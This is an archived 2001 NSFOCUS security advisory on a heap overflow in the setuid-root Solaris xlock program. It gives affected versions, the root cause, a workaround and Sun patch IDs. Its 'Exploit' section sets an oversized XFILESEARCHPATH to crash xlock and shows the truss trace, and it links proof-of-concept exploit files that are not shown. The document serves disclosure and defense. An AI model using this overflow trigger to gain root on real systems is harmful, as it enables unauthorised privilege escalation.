NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability

From: Nsfocus Security Team (securityat_private)
Date: Fri Aug 10 2001 - 01:49:42 PDT

Next message: H D Moore: "Re: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0"

Previous message: Vidovic,Zvonimir,VEVEY,GL-IS/CIS: "RE: ADV/EXP: netkit <=0.17 in.telnetd remote buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

NSFOCUS Security Advisory(SA2001-05)

Topic:  Solaris Xlock Heap Overflow Vulnerability

Release Date： 2001-08-10

CVE CAN ID : CAN-2001-0652
BUGTRAQ ID : 3160

Affected system:
================

  Sun Solaris 2.6 (SPARC/x86)
  Sun Solaris 7   (SPARC/x86) 
  Sun Solaris 8   (SPARC/x86) 


Impact: 
=========

NSFOCUS Security Team has found a heap buffer overflow vulnerability in the 
xlock shipped in Solaris system when handling some environment variables. 
Exploitation of it would allow a local attacker to obtain root privilege.

Description：
============

Xlock is a screen-locking tool of Solaris OpenView. It locks the X server until
a password is entered. It is installed suid root by default. 

It has an invalid boundary check in some environment variable handling. As the 
result, an attacker could overwrite dynamic memory boundary of heap area, 
run arbitrary code as root with carefully constructed overflow data.

The problem is within these two environment variables: "XFILESEARCHPATH" and 
"XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes memory and 
save the environment variable value in this dynamic memory. But xlock does not 
provide length check of environment variable when copying. In case that these 
two environment variables are set to be a string longer than 1024 bytes, a heap 
overflow might occur. Adjacent dynamic memory boundary tags could be 
overwritten, and segment fault would occur when malloc() is called next time. 
Some special "feature" of libc malloc()/free() implementation could be used to 
rewrite arbitrary memory like saved returned address and function pointer or 
other important data with carefully formed overflow data.

Exploiting this vulnerability successfully would give an attacker root privilege.


Exploit:
==========

bash-2.03$ uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
bash-2.03$ cp /usr/openwin/bin/xlock /tmp/xlock
bash-2.03$ export XFILESEARCHPATH=`perl -e 'print "A"x1028'`
bash-2.03$ /tmp/xlock
Segmentation Fault
bash-2.03$ truss -u libc:malloc,free /tmp/xlock
<...snip...>
<- libc:malloc() = 0x1135d0
-> libc:malloc(0x400, 0xffbefa8d, 0xffffffff, 0x1b648)
<- libc:malloc() = 0x1139d0
open("AAAAAAA...AAAAAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x1b648)
<- libc:free() = 0
-> libc:malloc(0x400, 0x12, 0x0, 0x10ed49)
<- libc:malloc() = 0x1139d0
open("/export/home/test/XLock", O_RDONLY)         Err#2 ENOENT
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x7efefeff)
<- libc:free() = 0
-> libc:malloc(0x3, 0x3073b, 0xffffffff, 0x3a300000)
<- libc:malloc() = 0x1135e0
    Incurred fault #6, FLTBOUNDS  %pc = 0xFF0C0F4C
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
        *** process killed ***

Proof of concept codes for this issue will be available at:
http://www.nsfocus.com/proof/sol_sparc_xlockex.c
http://www.nsfocus.com/proof/sol_x86_xlockex.c

Workaround:
===================

Drop the suid root attribute of xlock:

# chmod a-s /usr/openwin/bin/xlock



Vendor Status:
==============

2001.6.11       We informed Sun of this problem.
2001.6.14       Sun replied that the problem had been reproduced and they 
                had started to develop relevant patches.
2001.8.8        Sun informed us that the development of patches had finished and 
                would be released at the end of the month.
2001.8.9        Sun provided us with IDs of the patches to be released.

Sun's patches to be released for this vulnerability:

                SPARC           x86
                ---------       ---------
  Solaris 8     108652-38       108653-33
  Solaris 7     108376-30       108377-26
  Solaris 2.6   105633-60       106248-45


Security patches of Sun Inc. are available at:

http://sunsolve.sun.com/securitypatch


Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has 
assigned the name CAN-2001-0652 to this issue. This is a 
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems.  Candidates 
may change significantly before they become official CVE entries.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, 
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS 
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, 
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, 
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE 
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <securityat_private>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

application/octet-stream attachment: sol_x86_xlockex.c

application/octet-stream attachment: sol_sparc_xlockex.c

Next message: H D Moore: "Re: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0"
Previous message: Vidovic,Zvonimir,VEVEY,GL-IS/CIS: "RE: ADV/EXP: netkit <=0.17 in.telnetd remote buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 08:00:59 PDT